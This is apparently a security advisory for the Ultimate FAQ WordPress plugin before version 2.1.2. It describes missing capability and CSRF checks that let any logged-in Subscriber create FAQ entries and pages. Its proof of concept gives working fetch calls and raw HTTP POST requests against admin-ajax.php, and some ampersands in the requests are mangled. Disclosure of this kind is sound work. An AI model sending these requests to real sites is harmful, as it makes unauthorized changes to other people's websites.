Ultimate FAQ < 2.1.2 - Subscriber+ Arbitrary FAQ Creation

The plugin does not have capability and CSRF checks in the ewd_ufaq_welcome_add_faq and ewd_ufaq_welcome_add_faq_page AJAX actions, available to any authenticated users. As a result, any users, with a role as low as Subscriber could create FAQ and FAQ questions

PoC

fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“ewd_ufaq_welcome_add_faq_page”, “faq_page_title”: “hello”}), “method”: “POST”, “credentials”: “include” }); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 57 Connection: close Cookie: [any authenticated user] action=ewd_ufaq_welcome_add_faq_page&faq;_page_title=hello The FAQ will be created as a page (/wp-admin/edit.php?post_type=page&orderby;=date&order;=desc) fetch(“https://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “body”: new URLSearchParams({“action”:“ewd_ufaq_welcome_add_faq”, “faq_question”: “Have you ever heard the wolf cry to the blue corn moon?”, “faq_answer”: “Yes”}), “method”: “POST”, “credentials”: “include” }); POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: / Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate content-type: application/x-www-form-urlencoded Content-Length: 117 Connection: close Cookie: [any authenticated user] action=ewd_ufaq_welcome_add_faq&faq;_question=Have+you+ever+heard+the+wolf+cry+to+the+blue+corn+moon%3F&faq;_answer=Yes